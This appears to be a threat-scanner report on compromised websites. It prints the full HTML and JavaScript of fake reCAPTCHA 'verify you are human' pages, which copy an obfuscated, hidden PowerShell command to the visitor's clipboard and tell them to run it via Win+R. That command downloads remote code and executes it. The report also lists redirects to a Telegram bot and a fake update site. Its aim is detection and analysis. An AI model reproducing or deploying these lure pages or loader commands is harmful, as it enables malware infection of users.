CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://mail.lucprofessional.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://mail.finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://mail.finocci.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://browser.certif-update.website/ |
| URL | https://browser.certif-update.website/ |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://cambodiatouristservice.com/",
"URLs": [
"https://browser.certif-update.website/",
"https://browser.certif-update.website/"
],
"HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>",
"ThreatLevel": "None"
}
https://admin.gestroom.it/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://admin.gestroom.it/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://test.peperoncinochepassione.it/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"ClipboardCommands": "PowErsHeLL -W hiddEn ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n 